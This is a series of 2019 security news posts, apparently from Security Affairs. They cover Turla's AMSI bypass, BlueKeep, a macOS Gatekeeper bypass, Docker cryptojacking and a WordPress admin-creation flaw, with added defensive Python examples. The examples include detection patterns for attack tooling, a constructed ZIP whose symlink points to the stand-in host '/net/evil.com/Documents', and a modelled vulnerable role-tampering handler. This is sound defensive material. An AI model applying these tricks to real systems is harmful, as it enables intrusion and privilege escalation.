In some samples, Turla attackers have modified the PowerShell script in order to bypass the Antimalware Scan Interface (AMSI) implemented by Windows.

“This is an interface allowing any Windows application to integrate with the installed antimalware product. It is particularly useful for PowerShell and macros.” continues the report.

“They did not find a new bypass but re-used a technique presented at Black Hat Asia 2018 in the talk The Rise and Fall of AMSI. It consists of the in-memory patching of the beginning of the function AmsiScanBuffer in the library amsi.dll.”

The in-memory patch changes the beginning of AmsiScanBuffer so that the antimalware product never receives the buffer to scan, which disables scanning for the rest of the PowerShell session.
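The WMI persistence and the AMSI patch described above both surface in one artefact defenders can collect: the command line stored in each CommandLineEventConsumer. The following triage helper is an added example, not ESET’s tooling. It decodes PowerShell’s -EncodedCommand argument (base64 over UTF-16LE) and matches the decoded script against indicators taken from the report’s description (registry-stored stage, Invoke-ReflectivePEInjection, AmsiScanBuffer, 3DES); the indicator list, the sample consumer command line and the registry key it references are constructed for the example and are not Turla IoCs.

```python
"""Decode -EncodedCommand PowerShell launched from WMI event consumers and
look for the traits described for Turla's loader. Added example; the
indicator list and sample command lines are constructed, not ESET's IoCs."""
import base64
import re

# PowerShell's -EncodedCommand switch and its accepted abbreviations (-e, -ec, -en, -enc).
_ENC_RE = re.compile(r"(?i)(?:^|\s)-e(?:c|n|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})")

# Regex -> description. Assumed from the report's prose, not an official IoC list.
INDICATORS = {
    r"Get-ItemProperty[^\n]*HK(?:LM|CU):": "PowerShell stage read from the registry",
    r"Invoke-ReflectivePEInjection": "PowerSploit reflective PE loader",
    r"AmsiScanBuffer": "AMSI in-memory patch (AmsiScanBuffer)",
    r"TripleDES|3DES": "3DES payload decryption",
    r"__EventFilter|CommandLineEventConsumer": "WMI event subscription persistence",
}


def decode_encoded_command(cmdline):
    """Return the decoded script if the command line carries -EncodedCommand, else None."""
    m = _ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        raw = base64.b64decode(m.group(1), validate=True)
    except ValueError:          # binascii.Error is a ValueError subclass
        return None
    return raw.decode("utf-16le", errors="replace")


def triage_consumer(cmdline):
    """Return the indicator descriptions matched by one consumer command line,
    searching both the raw command line and the decoded script."""
    script = decode_encoded_command(cmdline)
    text = cmdline + "\n" + (script or "")
    return [desc for pat, desc in INDICATORS.items() if re.search(pat, text, re.I)]


# Constructed sample script mirroring the reported traits (not a real Turla stage);
# the HKLM key path is hypothetical.
_SAMPLE_SCRIPT = (
    "$b = (Get-ItemProperty -Path 'HKLM:\\SOFTWARE\\Example\\Stage').Blob;"
    "$k = New-Object System.Security.Cryptography.TripleDESCryptoServiceProvider;"
    "Invoke-ReflectivePEInjection -PEBytes $pe -ProcId (Get-Random)"
)
SAMPLE_CONSUMER = (
    "powershell.exe -NoP -NonI -W Hidden -enc "
    + base64.b64encode(_SAMPLE_SCRIPT.encode("utf-16le")).decode("ascii")
)
# Constructed benign consumer: -ExecutionPolicy must not be mistaken for -e.
BENIGN_CONSUMER = "powershell.exe -ExecutionPolicy Bypass -File C:\\scripts\\cleanup.ps1"

if __name__ == "__main__":
    for c in (SAMPLE_CONSUMER, BENIGN_CONSUMER):
        print(c[:60], "->", triage_consumer(c) or ["nothing matched"])
```

On a live host the command lines come from the CommandLineEventConsumer instances in root\subscription; feed each CommandLineTemplate to triage_consumer and review anything that matches more than one indicator.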

The PowerShell loader is used to launch malware; one of these malicious codes is a backdoor based on the RPC protocol.

Turla also has a lightweight PowerShell backdoor in its arsenal, tracked as PowerStallion, which uses cloud storage as its C2 server.

A few weeks ago, ESET researchers discovered a Turla backdoor tracked as LightNeuron that was specifically developed to hijack Microsoft Exchange mail servers.

ESET confirmed that the PowerShell scripts have been used in campaigns aimed at political targets in Eastern Europe. According to the researchers, the same scripts are also used against other targets in Western Europe and the Middle East.

“Finally, the usage of open-source tools does not mean Turla has stopped using its custom tools. The payloads delivered by the PowerShell scripts, the RPC backdoor and PowerStallion, are actually very customized. Our recent analysis of Turla LightNeuron is additional proof that this group is still developing complex, custom malware.” concludes the report.

The ESET report includes technical details and IoCs associated with the recent attacks.


Pierluigi Paganini

(SecurityAffairs – Turla, hacking)


The post ESET analyzes Turla APT’s usage of weaponized PowerShell appeared first on Security Affairs.

Apple updates address SQLite, WebKit issues in iTunes and iCloud for Windows

Apple released security updates for Windows versions of iTunes and iCloud, to address recently disclosed SQLite and WebKit security flaws.

Apple released security updates to address recently disclosed SQLite and WebKit security vulnerabilities affecting Windows versions of iTunes and iCloud.

Apple released iTunes for Windows 12.9.5 that addresses a total of 25 flaws, four SQLite issues and 21 vulnerabilities in WebKit.

Apple addressed the SQLite vulnerabilities tracked as CVE-2019-8577 and CVE-2019-8602 that could be exploited by an application to gain elevated privileges.

Another SQLite bug, tracked as CVE-2019-8600, is a memory corruption vulnerability that could be exploited to execute arbitrary code by sending a maliciously crafted SQL query to the vulnerable install.

The fourth SQLite flaw, tracked as CVE-2019-8598, is an input validation issue that could allow an application to read restricted memory.

All the SQLite issues were reported by Omer Gull from Check Point Research.

The CVE-2019-8607 flaw in WebKit is an out-of-bounds read that could lead to the disclosure of process memory when processing maliciously crafted web content.  The flaw was reported by Junho Jang and Hanul Choi of LINE Security Team.

The other flaws in WebKit addressed by Apple could lead to arbitrary code execution during the processing of maliciously crafted web content.  

The security advisory published by Apple is available here.

The tech giant also released iCloud for Windows 7.12 to address all these security issues. 


Pierluigi Paganini

(SecurityAffairs – Apple, iCloud, iTunes)

The post Apple updates address SQLite, WebKit issues in iTunes and iCloud for Windows appeared first on Security Affairs.

Cryptojacking campaign uses Shodan to scan for Docker hosts to hack

A new cryptojacking campaign was spotted by experts at Trend Micro, crooks are using Shodan to scan for Docker hosts with exposed APIs.

Threat actors are using the popular Shodan search engine to find Docker hosts and abuse them in a cryptojacking campaign. Attackers leverage self-propagating Docker images infected with Monero miners and scripts that use Shodan to find other vulnerable installs and compromise them.

The experts discovered the attacks after setting up a honeypot that simulated a Docker host with an exposed API.

“We discovered that the images are first deployed using a script (ubu.sh, detected as PUA.Linux.XMRMiner.AA.component) that checks hosts with publicly exposed APIs. It then uses Docker commands (POST /containers/create) to remotely create the malicious container. This script also starts an SSH daemon inside the container for remote communication.” reads the analysis published by Trend Micro.

“The script then calls a Monero coin-mining binary, darwin (detected as PUA.Linux.XMRMiner.AA), to run in the background. As with all cryptocurrency miners, it uses the resources of the host system to mine cryptocurrency (Monero in this instance) without the owner’s knowledge.”

docker cryptojacking

The scripts used by the hackers in this campaign scan for vulnerable hosts via Shodan. They scan for hosts with the 2375 port open and deploy more infected containers to the host after brute-forcing them.

An exposed API allows the attacker to execute commands on the Docker host, manage its containers and, of course, deploy infected images from a Docker Hub repository under their control.

The analysis of the logs and traffic data coming to and from the honeypot, revealed that the attackers used a container from a public Docker Hub repository named zoolu2. Researchers discovered that the repository contained nine images comprised of custom-made shells, Python scripts, configuration files, as well as Shodan and cryptocurrency-mining binaries.

The good news is that Docker discovered the same repository independently and took it offline.

The same threat actors also used another Docker Hub repository, associated with the ‘marumira‘ account, in previous attacks. Once this account was deactivated the threat actors moved to zoolu2.

While the attackers launch a scanning process for Docker hosts to compromise, a custom built Monero coin-mining binary is executed in the background.

“An interesting characteristic of the attack is that it uses a cryptocurrency miner that it is being built from scratch instead of an existing one.” continues the report.

Every time an exposed Docker host is discovered, it is added to a list (iplist.txt file), which the attackers then sort for unique IPs. The script also checks whether the Docker host already runs a cryptocurrency-mining container and deletes it if it exists.

The above list is sent to the C2 servers to deploy additional containers to other exposed hosts based on the IP list.

Attacks like the one detected by Trend Micro are not a novelty in the threat landscape, a similar campaign was also spotted by researchers from Imperva in early March.

The same malicious campaign was also analyzed by the Alibaba Cloud Security team that tracked it as Xulu.

“These threats are often successful, not only due to the exploitation of flaws and vulnerabilities in the container software but also due to misconfiguration, which remains a constant challenge for organizations. In this case, the hosts that have exposed APIs are not just victims of cryptocurrency-mining operations — they also contribute further to the distribution of the infected containers.” concludes Trend Micro.

“Unwanted cryptocurrency-mining activity can lead to additional resource load for the targets. In this example, if the Docker host is running on internal infrastructure, other hosts can also suffer. On the other hand, if the Docker host is using a cloud service provider, the organization can accrue additional charges due to the higher resource usage.”
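The misconfiguration Trend Micro points to is a Docker daemon that listens on TCP without TLS client verification, which hands the Engine API (and therefore POST /containers/create) to anyone who can reach the port. The following audit helper is an added example, not Trend Micro’s code: it inspects a dockerd command line and daemon.json text for -H/--host tcp:// listeners and the --tlsverify/"tlsverify" setting. The argument vectors in the tests are constructed; the port 2375/2376 convention is Docker’s own.

```python
"""Audit a Docker daemon's listening configuration for an Engine API reachable
over TCP without TLS client verification. Added example; it reads the dockerd
argv and daemon.json text instead of probing the network."""
import json
from urllib.parse import urlsplit

DEFAULT_UNENCRYPTED_PORT = 2375   # Docker's conventional plaintext API port
DEFAULT_TLS_PORT = 2376


def _hosts_from_argv(argv):
    """Collect -H/--host values (both '-H value' and '-H=value' forms)."""
    hosts, i = [], 0
    while i < len(argv):
        a = argv[i]
        if a in ("-H", "--host") and i + 1 < len(argv):
            hosts.append(argv[i + 1])
            i += 2
            continue
        for prefix in ("-H=", "--host="):
            if a.startswith(prefix):
                hosts.append(a[len(prefix):])
        i += 1
    return hosts


def audit_docker_daemon(argv, daemon_json=None):
    """Return findings for TCP listeners that would accept unauthenticated API calls."""
    hosts = _hosts_from_argv(argv)
    tlsverify = any(a in ("--tlsverify", "--tlsverify=true") for a in argv)
    if daemon_json:
        cfg = json.loads(daemon_json)
        hosts += cfg.get("hosts", [])
        tlsverify = tlsverify or bool(cfg.get("tlsverify", False))
    findings = []
    for h in hosts:
        u = urlsplit(h)
        if u.scheme != "tcp":
            continue   # unix:// and fd:// sockets are governed by file permissions
        port = u.port or DEFAULT_UNENCRYPTED_PORT
        bind = u.hostname or "0.0.0.0"
        if not tlsverify:
            findings.append(f"{h}: API on {bind}:{port} without TLS client verification; "
                            f"anyone who can reach it can POST /containers/create")
        elif port == DEFAULT_UNENCRYPTED_PORT:
            findings.append(f"{h}: TLS enforced but on the conventional plaintext port {port}")
    return findings


if __name__ == "__main__":
    # Constructed example invocations, weak one first.
    print(audit_docker_daemon(["dockerd", "-H", "unix:///var/run/docker.sock",
                               "-H", "tcp://0.0.0.0:2375"]))
    print(audit_docker_daemon(["dockerd", "--tlsverify", "--tlscacert=/etc/docker/ca.pem",
                               "-H=tcp://0.0.0.0:2376"]))
```

Read the live argv from /proc/<dockerd pid>/cmdline and the config from /etc/docker/daemon.json; a listener that shows up here is exactly what the Shodan query in this campaign finds, so either bind it to a management network behind TLS or drop the tcp:// host entirely.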



Pierluigi Paganini

(SecurityAffairs – Docker, hacking)

The post Cryptojacking campaign uses Shodan to scan for Docker hosts to hack appeared first on Security Affairs.

0patch released micropatch for BearLPE Zero-Day flaw in Windows 10 Task Scheduler

Researchers at 0patch released a temporary micropatch for the unpatched BearLPE local privilege escalation zero-day flaw in Windows 10.

Experts at 0patch released a micropatch that temporarily fixes a still-unpatched local privilege escalation flaw without rebooting the affected systems.

The zero-day vulnerability, dubbed BearLPE, was recently disclosed by the security researcher SandboxEscaper.

The following video shows how the micropatch, composed of just five instructions, works on a vulnerable machine:

The exploit published by the researcher triggers a flaw in the Task Scheduler of Windows 10.

SandboxEscaper discovered that, even starting with limited privileges, it is possible to obtain SYSTEM rights by invoking a specific function. SandboxEscaper published a video PoC of the Windows zero-day that shows how to trigger it on Windows x86.

Will Dormann, vulnerability analyst at CERT/CC, confirmed that the exploit works on a fully patched (May 2019) Windows 10 x86 system; it is 100% reliable on x86 and needs to be recompiled for x64 machines.

“When you run Windows XP schtasks.exe on Windows 10, legacy RPC functions are called – which in turn call the current ones, such as SchRpcSetSecurity,” explained 0patch co-founder Mitja Kolsek.

The micropatch prevents changing the set of permissions a normal user has over a system file.


Pierluigi Paganini

(SecurityAffairs – micropatch, BearLPE)


The post 0patch released micropatch for BearLPE Zero-Day flaw in Windows 10 Task Scheduler appeared first on Security Affairs.

Microsoft warns for the second time of applying BlueKeep patch

Microsoft issued a new warning for users to update their systems to address the remote code execution vulnerability dubbed BlueKeep.

Microsoft issued a new warning for users of older Windows OS versions to update their systems in order to patch the remote code execution vulnerability dubbed BlueKeep.

The vulnerability, tracked as CVE-2019-0708, impacts the Windows Remote Desktop Services (RDS) and was addressed by Microsoft with May 2019 Patch Tuesday updates. BlueKeep is a wormable flaw that can be exploited by malware authors to create malicious code with WannaCry capabilities.

As explained by Microsoft, the vulnerability requires no user interaction, so malware exploiting it could spread in an uncontrolled, worm-like way across target networks.

Many security experts have already developed their own exploit code for this issue without publicly disclosing it for obvious reasons.

Microsoft has released patches for Windows 7, Server 2008, XP and Server 2003. Windows 7 and Server 2008 users can prevent unauthenticated attacks by enabling Network Level Authentication (NLA), and the threat can also be mitigated by blocking TCP port 3389.

Now Microsoft is warning again companies to patch older versions of Windows to avoid the exploitation of the flaw. Security experts fear a new massive attack that could affect millions of computers worldwide running still unpatched systems.

The availability of exploit code in the wild poses a severe risk to users. Experts at the SANS Institute observed two partial exploits that are publicly available. Chaouki Bekrar, the founder of zero-day broker firm Zerodium, explained that the flaw can be exploited remotely by an unauthenticated user to gain access to a device with SYSTEM privileges. Researchers at McAfee developed a PoC exploit that achieves remote code execution.

Other experts also announced that they have successfully developed exploits for BlueKeep, including Kaspersky, Check Point, and MalwareTech.

Recently, the popular expert Robert Graham scanned the Internet for vulnerable systems. He discovered more than 923,000 potentially vulnerable devices using the masscan port scanner and a modified version of rdpscan.
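The same two-step approach scales down to your own address space: first find what answers on TCP 3389, then check each host for the patch. The helper below is an added example, not part of Graham’s rdpscan; it parses masscan’s list output (the `-oL` format, assumed here to be lines of `open tcp <port> <ip> <epoch>` between a `#masscan` header and a `# end` trailer) and groups hosts with RDP exposed by the prefixes you own. The scan lines are constructed with documentation addresses.

```python
"""Group hosts with TCP 3389 open, taken from masscan -oL output, by owned
prefix. Added example; the masscan list format is assumed as described in the
lead-in and the sample scan below is constructed."""
import ipaddress
from collections import defaultdict

RDP_PORT = 3389


def parse_masscan_list(text):
    """Yield (ip, port) for every 'open tcp' record in masscan list output."""
    for line in text.splitlines():
        if not line or line.startswith("#"):
            continue            # '#masscan' header and '# end' trailer
        parts = line.split()
        if len(parts) >= 4 and parts[0] == "open" and parts[1] == "tcp":
            yield parts[3], int(parts[2])


def rdp_exposure(text, owned_prefixes):
    """Map each owned prefix to the hosts in it with TCP 3389 open.
    Hosts outside every owned prefix land under the key 'other'."""
    nets = [ipaddress.ip_network(p) for p in owned_prefixes]
    exposure = defaultdict(list)
    for ip, port in parse_masscan_list(text):
        if port != RDP_PORT:
            continue
        addr = ipaddress.ip_address(ip)
        bucket = next((str(n) for n in nets if addr in n), "other")
        exposure[bucket].append(ip)
    return dict(exposure)


# Constructed scan output using RFC 5737 documentation addresses.
SAMPLE_SCAN = """#masscan
open tcp 3389 198.51.100.23 1559312345
open tcp 3389 198.51.100.77 1559312346
open tcp 443 198.51.100.77 1559312347
open tcp 3389 203.0.113.5 1559312348
# end
"""

if __name__ == "__main__":
    for prefix, hosts in rdp_exposure(SAMPLE_SCAN, ["198.51.100.0/24"]).items():
        print(prefix, "->", ", ".join(hosts))
```

An open port is only the exposure list, not proof of vulnerability: each host still has to be checked for the May 2019 update, and for NLA on Windows 7 and Server 2008, before you can call it patched.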

“Microsoft is confident that an exploit exists for this vulnerability, and if recent reports are accurate, nearly one million computers connected directly to the internet are still vulnerable to CVE-2019-0708. Many more within corporate networks may also be vulnerable. It only takes one vulnerable computer connected to the internet to provide a potential gateway into these corporate networks, where advanced malware could spread, infecting computers across the enterprise.” reads the advisory published by Simon Pope, Director of Incident Response, Microsoft Security Response Center (MSRC). “This scenario could be even worse for those who have not kept their internal systems updated with the latest fixes, as any future malware may also attempt further exploitation of vulnerabilities that have already been fixed.”

Even if there has been no sign of attacks exploiting the flaw in the wild Microsoft recommends updating the vulnerable Windows versions as soon as possible. 

“It’s been only two weeks since the fix was released and there has been no sign of a worm yet. This does not mean that we’re out of the woods. If we look at the events leading up to the start of the WannaCry attacks, they serve to inform the risks of not applying fixes for this vulnerability in a timely manner.” concludes the advisory.

“Our recommendation remains the same. We strongly advise that all affected systems should be updated as soon as possible.”

Microsoft also pointed out that workstations not directly connected to the Internet are still exposed to the risk of compromise.




Pierluigi Paganini

(SecurityAffairs – BlueKeep, hacking)

The post Microsoft warns for the second time of applying BlueKeep patch appeared first on Security Affairs.

Security expert shows how to bypass macOS Gatekeeper

A security researcher demonstrated how to bypass the Apple macOS Gatekeeper by leveraging trust in network shares.

The Italian security researcher Filippo Cavallarin demonstrated how to bypass the macOS Gatekeeper by leveraging trust in network shares.

Apple’s Gatekeeper is designed to protect macOS users by performing a number of checks before allowing an app to run. By default it blocks apps that were not downloaded from the App Store or signed by an identified Apple developer.

Filippo Cavallarin demonstrated how to bypass Gatekeeper and execute untrusted code without the user’s explicit permission and without any warning to the victim.

Gatekeeper considers both external drives and network shares as safe locations, this means that any application in these locations could run without asking for the user’s consent.

The attacker chains two legitimate macOS features: automount (aka autofs) and the ability of ZIP archives to carry symbolic links, which the system’s archive utility does not check.

“As per-design, Gatekeeper considers both external drives and network shares as safe locations and it allows any application they contain to run.” wrote the expert.”By combining this design with two legitimate features of MacOS X, it will result in the complete deceivement of the intended behaviour.” 

The autofs feature allows a user to automatically mount a network share by accessing a “special” path, in this specific case any path beginning with “/net/” (i.e. /net/evil-attacker.com/sharedfolder/).

The second feature is that ZIP archives can include symbolic links pointing to arbitrary locations, in this case automount endpoints.

Cavallarin discovered that the software responsible for decompressing the ZIP archives does not perform any check on the symlinks.

An attacker can create a ZIP file containing a symbolic link to an automount endpoint under their control and send it to the victim. When the victim extracts the archive and follows the symlink, they land in a location controlled by the attacker that Gatekeeper also trusts. 

“To better understand how this exploit works, let’s consider the following scenario:
An attacker crafts a zip file containing a symbolic link to an automount endpoint she/he controls (ex Documents -> /net/evil.com/Documents) and sends it to the victim. The victim downloads the malicious archive, extracts it and follows the symlink.” continues the expert.

“Now the victim is in a location controlled by the attacker but trusted by Gatekeeper, so any attacker-controlled executable can be run without any warning. The way Finder is designed (ex hide .app extensions, hide full path from titlebar) makes this technique very effective and hard to spot.”

Below a video PoC of the attack:

As a workaround, the expert suggests disabling the automount feature with the following procedure:

  1. Edit /etc/auto_master as root
  2. Comment the line beginning with ‘/net’
  3. Reboot
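Both halves of the bypass can be checked before anyone double-clicks. The following helper is an added example, not Cavallarin’s code: it lists ZIP entries that are symbolic links pointing under /net/ (Python’s zipfile exposes the Unix mode in the high 16 bits of external_attr, and a symlink entry’s data is its target path) and it reports whether an /etc/auto_master text still has an uncommented /net line, i.e. whether the workaround above has been applied. The archive and the auto_master contents are constructed inside the block; the /net/evil.com path mirrors the researcher’s own example.

```python
"""Detect the two ingredients of the Gatekeeper bypass: a ZIP symlink into an
autofs path and an /etc/auto_master that still enables /net. Added example;
the archive and auto_master text are constructed here."""
import io
import posixpath
import stat
import zipfile


def _targets_automount(target):
    """True for an absolute link into /net or a relative one that climbs into it."""
    norm = posixpath.normpath(target)
    return norm.startswith("/net/") or (norm.startswith("..") and "/net/" in norm)


def find_automount_symlinks(zip_bytes):
    """Return (entry_name, link_target) for every symlink entry aimed at an automount path."""
    hits = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            mode = info.external_attr >> 16          # Unix mode lives in the high 16 bits
            if not stat.S_ISLNK(mode):
                continue
            target = zf.read(info).decode("utf-8", errors="replace")  # a symlink's data is its target
            if _targets_automount(target):
                hits.append((info.filename, target))
    return hits


def net_automount_enabled(auto_master_text):
    """True if /etc/auto_master still has an uncommented /net map line."""
    for line in auto_master_text.splitlines():
        s = line.strip()
        if not s or s.startswith("#"):
            continue
        if s.split()[0] == "/net":
            return True
    return False


def build_sample_archive():
    """Constructed archive: 'Documents' is a symlink to an attacker-controlled automount share."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("README.txt", "open the Documents folder")
        link = zipfile.ZipInfo("Documents")
        link.create_system = 3                          # 3 = Unix, so the mode bits are meaningful
        link.external_attr = (stat.S_IFLNK | 0o777) << 16
        zf.writestr(link, "/net/evil.com/Documents")
    return buf.getvalue()


# Constructed auto_master texts: stock layout, and the same file with /net commented out.
DEFAULT_AUTO_MASTER = """#
# Automounter master map
#
+auto_master\t\t# Use directory service
/net\t\t\t-hosts\t\t-nobrowse,hidefromfinder,nosuid
/home\t\t\tauto_home\t-nobrowse,hidefromfinder
"""
HARDENED_AUTO_MASTER = DEFAULT_AUTO_MASTER.replace("\n/net", "\n#/net")

if __name__ == "__main__":
    print("suspicious links:", find_automount_symlinks(build_sample_archive()))
    print("/net automount enabled:", net_automount_enabled(DEFAULT_AUTO_MASTER))
```

Run find_automount_symlinks on attachments at the mail gateway or in a download hook; an archive that carries a symlink into /net has no legitimate reason to exist.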

Cavallarin reported his findings to Apple on February 22, 2019. According to the researcher, Apple indicated a fix would ship on May 15, 2019, but then stopped responding to his emails. 

“The vendor has been contacted on February 22th 2019 and it’s aware of this issue.” concludes the researcher. “This issue was supposed to be addressed, according to the vendor, on May 15th 2019 but Apple started dropping my emails. Since Apple is aware of my 90 days disclosure deadline, I make this information public. ”


Pierluigi Paganini

(SecurityAffairs – Gatekeeper, hacking)

The post Security expert shows how to bypass macOS Gatekeeper appeared first on Security Affairs.

The Pyramid Hotel Group data leak exposes 85GB of security logs of major hotel chains

vpnMentor researchers have recently discovered that hotel brands managed by The Pyramid Hotel Group have suffered a data leak.

vpnMentor experts have discovered that hotel brands managed by The Pyramid Hotel Group, including Marriott, have suffered a data leak.

vpnMentor’s research team discovered the unprotected server through port scanning to examine known IP blocks.

Researchers discovered 85.4GB of security audit logs, the exposed data also include monitoring and alerts, reported system errors, misconfiguration, policy violations, potential attempted malicious breaches, and other cybersecurity events. Unsecured data also include personally identifying information (PII) of employees.

The exposed data dates back to April 19, 2019, likely the date of the system setup or reconfiguration that is the root cause of the leak.

The unsecured server exposed audit logs generated by Wazuh, an open-source intrusion detection system used by the company.

“The Pyramid Hotel Group utilizes Wazuh – an open source intrusion detection system – on an unsecured server that is leaking information regarding their operating systems, security policies, internal networks, and application logs.” reads the post published by vpnMentor.

Pyramid Hotel Group

The Pyramid Hotel Group manages hospitality and resort properties in the US, Hawaii, the Caribbean, Ireland and the UK; its portfolio includes locations of several brands such as Marriott, Sheraton, Plaza and Hilton, as well as other independent hotels.

Data leaked by the company could be used by attackers to gather information about the hotels’ networks and the security measures implemented to protect them. This information could then be used by hackers in later attacks.

Below is the timeline of the discovery:

Date       Event
5/27/19    Breach discovered by vpnMentor Research team
5/28/19    Informed PHG of breach
5/28/19    Received acknowledgement from PHG
5/29/19    Data leak closed. Problem resolved.

Recently vpnMentor experts discovered an unprotected database impacting up to 65% of US households.

Pierluigi Paganini

(SecurityAffairs – Pyramid Hotel Group, data leak)

The post The Pyramid Hotel Group data leak exposes 85GB of security logs of major hotel chains appeared first on Security Affairs.

Convert Plus WordPress plugin flaw allows hackers to create Admin accounts

The WordPress plugin Convert Plus is affected by a critical flaw that could be exploited by an unauthenticated attacker to create accounts with administrator privileges.

The WordPress plugin Convert Plus is affected by a critical vulnerability that could be exploited by an unauthenticated attacker to create accounts with administrator privileges.

Convert Plus plugin

The vulnerability stems from a lack of filtering when processing a new user subscription submitted via a form implemented by the Convert Plus plugin, which has more than 100,000 active installations.

Convert Plus aims at generating more subscribers and sales conversions using popups, header & footer bars, slide-in forms, sidebar widgets, in-line forms, and social buttons.

New subscribers can use a specific form that allows them to choose the role they want; of course, administrator is not among the options in the drop-down menu.

Experts at Defiant discovered that the Convert Plus plugin carries the intended role in a hidden form field called “cp_set_user.” They pointed out that the value of this field is supplied by the same HTTP request as the rest of the subscription entry, so users can modify it.

“However, in vulnerable versions of the plugin, this intended user role wasn’t fetched from the database on submission. Instead, this setting was reflected in a hidden field on the plugin’s forms called cp_set_user.” reads the analysis by the experts. “Because this value is supplied by the same HTTP request as the rest of the subscription entry, it can be modified by the user.”

It would be very easy for an attacker to submit a subscription form and change the value of “cp_set_user” to “administrator” in order to create a new admin user.

“This code calls the plugin’s function cp_add_new_user_role with the role provided in the AJAX request, which then handles the process of creating the user as directed.” continues the analysis.

“Since no filtering is applied when this new subscription is processed, if an attacker submits a subscription form and changes the value of cp_set_user to “administrator”, the plugin will create an administrator user associated with the given email address.”

The hack creates the new admin account with a randomized password, but this is not an obstacle because the attacker can simply use the standard password reset procedure to set a new one.
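The pattern Defiant describes, modelled in Python as an added example (it is not the plugin's PHP and uses no WordPress API): the vulnerable handler reads the role back from the hidden cp_set_user field of the request, while the hardened handler ignores that field, looks the role up in server-side form settings keyed by a form id, and refuses anything outside an allow-list. The form id, the settings table, the allow-list and the tampered request are all constructed for this example.

```python
import secrets

# Roles a public subscription form may ever hand out (assumed allow-list).
ALLOWED_SUBSCRIBER_ROLES = {"subscriber", "contributor"}

# Constructed server-side form settings: the role the site admin configured
# for each form when building it. In the fixed handler the role must come
# from here, never from the submitted request.
FORM_SETTINGS = {
    "newsletter-popup": {"role": "subscriber"},
}


def _create_user(email, role, user_store):
    """Create a user with a random password and return the record."""
    record = {"email": email, "role": role, "password": secrets.token_urlsafe(16)}
    user_store[email] = record
    return record


def handle_subscription_vulnerable(request, user_store):
    """Mirrors the flaw: the role is taken from the hidden cp_set_user field,
    which is part of the client-controlled HTTP request."""
    role = request.get("cp_set_user", "subscriber")
    return _create_user(request["email"], role, user_store)


def handle_subscription_fixed(request, user_store):
    """Hardened handler: cp_set_user is never read; the role comes from the
    server-side settings for the submitted form id and must be on the allow-list."""
    form = FORM_SETTINGS.get(request.get("form_id"))
    if form is None:
        raise ValueError("unknown form id")
    role = form["role"]
    if role not in ALLOWED_SUBSCRIBER_ROLES:
        # Defence in depth: even a misconfigured form can never mint privileged users.
        raise ValueError("form is configured with a non-subscriber role: %s" % role)
    return _create_user(request["email"], role, user_store)


# Constructed request in which the hidden field has been tampered with.
TAMPERED_REQUEST = {
    "form_id": "newsletter-popup",
    "email": "attacker@example.invalid",
    "cp_set_user": "administrator",
}


def demo():
    """Run the same tampered request through both handlers; return the roles granted."""
    vulnerable_users, fixed_users = {}, {}
    vuln = handle_subscription_vulnerable(TAMPERED_REQUEST, vulnerable_users)
    fixed = handle_subscription_fixed(TAMPERED_REQUEST, fixed_users)
    return vuln["role"], fixed["role"]
```

The general rule the fixed handler follows is that any authorization-relevant value (role, price, owner id) must be resolved server-side from the identity of the form or session, never echoed through a hidden field and trusted on the way back.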

The vulnerability affects all versions of the Convert Plus plugin up to 3.4.2; administrators should update their installations to version 3.4.3.

Defiant experts also published a video PoC for the exploitation of the issue.

Below is the disclosure timeline of the vulnerability:

  • May 24 – Vulnerability discovered. Notified developers privately.
  • May 28 – Patch released by developers. Firewall rule released for Premium users.
  • June 27 – Planned date for firewall rule’s release to Free users.

Pierluigi Paganini

(SecurityAffairs – Convert Plus plugin, hacking)

The post Convert Plus WordPress plugin flaw allows hackers to create Admin accounts appeared first on Security Affairs.

VPNpro research: this Chinese-linked company secretly owns 10 VPNs with 86 million installs

Innovative Connecting is actually a Chinese company that secretly owns 10 VPN products with a total of 86 million installs under its belt.

Recent research by the cybersecurity experts at VPNpro shows that the popular mobile VPN developer Innovative Connecting is actually a Chinese company that secretly owns 10 VPN products with a total of 86 million installs under its belt.

The study also revealed that two of those VPN products are under its other developer name, Lemon Clove, and another two by Autumn Breeze 2018.

Interestingly, most of the popular mobile-only VPNs that VPNpro analyzed are actually Chinese (run by Chinese nationals or actually located in China). Any data that is held in mainland China is wide open to access by Chinese authorities, confirming US Senators’ recent fears of American data falling into Chinese or Russian hands.

Innovative Connecting VPNs products

Innovative Connecting owns the following 10 VPN products:

  1. VPN Master – Free Proxy
  2. VPN Proxy Master (Pro)
  3. VPN Proxy Master (Lite)
  4. Turbo VPN
  5. Unlimited Free VPN
  6. HOT VPN
  7. Snap VPN
  8. VPN Robot
  9. VPN Sofast
  10. Turbo VPN Private Browser

Source: VPNpro

What is the relationship between Innovative Connecting, Lemon Clove and ALL Connected?

VPNpro’s research reveals that there is a clear relationship between these three companies. Innovative Connecting has more than a strong business relationship with Lemon Clove, which creates the popular Snap VPN and VPN Robot apps.

Lemon Clove and Innovative Connecting share the same secretary, Loo Ping Yoo, and key addresses. Both Lemon Clove’s website and Innovative Connecting’s website are the same, with only small changes in text.

If you search for VPN Proxy Master on Apple’s App Store, the developer name appears as ALL Connected, while Innovative Connecting is listed as the developer on Google Play.

ALL Connected’s Turbo and Master VPN are on similar Cloudfront domains that link to Innovative Connecting. The App Store policy for VPN Master (developed by Innovative Connecting) is hosted on ALL Connected’s domain. All the policies for these VPN apps have the exact same broken English and typos.

Innovative Connecting’s Director seems to be Danny Chen, the well-known Chinese entrepreneur and CEO behind Linksure. Beyond that, the researchers discovered that the email address used to register turbovpn.co (developed by Innovative Connecting) also registered lemonclove.net, vpnsnap.com, and many others.

Why does it matter if a company owns multiple VPN products?

There is nothing wrong with owning multiple VPN brands – but there must be transparency between the company and its users. Trust is the most important factor for most users of VPN services. Beyond this, there are two further crucial issues:

1. Privacy

In a recent US survey, 95% of internet users said they were either somewhat concerned or very concerned about their privacy. However, if VPNs are actually located in a 5/9/14 Eyes country, which are normally high-surveillance countries, or in a repressive country like China or Russia, users’ data is most likely already in those governments’ hands.

2. Security

If a VPN’s parent company is untrustworthy, including having weak security or actively engaged in malicious activities, it can be a big problem. This can lead to users’ data being stolen and sold on the black market, or even having their computers hacked into.

Bottom line

There are thousands of VPN companies out there, and unfortunately many of them have weak security and privacy features, or are outright malicious in wanting to steal or sell user data.

To help you find a trustworthy VPN, follow the steps below:

  • carefully read the privacy policy of a VPN provider
